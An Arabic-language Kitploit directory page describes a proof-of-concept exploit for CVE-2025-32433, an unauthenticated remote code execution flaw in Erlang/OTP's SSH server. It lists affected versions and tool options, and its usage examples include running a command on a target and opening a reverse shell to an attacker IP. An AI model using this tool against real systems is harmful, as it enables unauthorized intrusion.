Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — تسمح الثغرة لمهاجم لديه وصول عبر الشبكة إلى خادم SSH الخاص بـ Erlang/OTP بتنفيذ تعليمات برمجية عشوائية دون مصادقة مسبقة. | Kitploit
أدوات/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

تسمح الثغرة لمهاجم لديه وصول عبر الشبكة إلى خادم SSH الخاص بـ Erlang/OTP بتنفيذ تعليمات برمجية عشوائية دون مصادقة مسبقة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
162منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

الثغرة تسمح للمهاجم الذي لديه وصول شبكي إلى خادم SSH الخاص بـ Erlang/OTP بتنفيذ تعليمات برمجية عشوائية دون مصادقة مسبقة.

الوصف

تم تحديد ثغرة خطيرة في خادم SSH الخاص بـ Erlang/OTP قد تسمح للمهاجم بتنفيذ تعليمات برمجية عن بُعد (RCE) دون مصادقة. من خلال استغلال خلل في معالجة رسائل بروتوكول SSH، يمكن لفاعل ضار الحصول على وصول غير مصرح به إلى الأنظمة المتأثرة وتنفيذ أوامر عشوائية دون بيانات اعتماد صالحة. قد يؤدي ذلك إلى اختراق تلك المضيفات، مما يسمح بالوصول غير المصرح به إلى البيانات الحساسة والتلاعب بها من قبل أطراف ثالثة، أو هجمات حجب الخدمة.

الإصدارات المتأثرة

root@kitploit:~
OTP-27.3.2 والإصدارات الأقدم
OTP-26.2.5.10 والإصدارات الأقدم
OTP-25.3.2.19 والإصدارات الأقدم

الميزات

  • فحص الثغرة: تحديد ما إذا كان الهدف معرضًا لـ CVE-2025-32433.
  • تنفيذ الاستغلال: تنفيذ أوامر عشوائية.
  • شل عكسي: بدء شل عكسي قائم على bash.

الاستخدام

root@kitploit:~
python cve-2025-32433.py <host> [options]

الخيارات:

root@kitploit:~
-p PORT, --port PORT: منفذ SSH (الافتراضي: 22)

-t TIMEOUT, --timeout TIMEOUT: مهلة الاتصال بالثواني (الافتراضي: 5)

-c COMMAND, --command COMMAND: أمر مخصص للتنفيذ

--check: التحقق مما إذا كان الهدف معرضًا للثغرة

-u urls.txt, --urlfile urls.txt: ملف يحتوي على قائمة بالمضيفات لفحصها (مضيف واحد لكل سطر)

-o output.txt, --output output.txt: ملف الإخراج لتخزين النتائج.

--shell: إطلاق شل عكسي

--lhost LHOST: عنوان IP للمهاجم للشل العكسي

--lport LPORT: منفذ المهاجم للشل العكسي (الافتراضي: 4444)

أمثلة:

فحص الثغرة:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

تنفيذ أمر:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

إطلاق شل عكسي:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

المراجع

إشعار GitHub

NVD CVE-2025-32433

منصة الأمان

تنزيل الأداة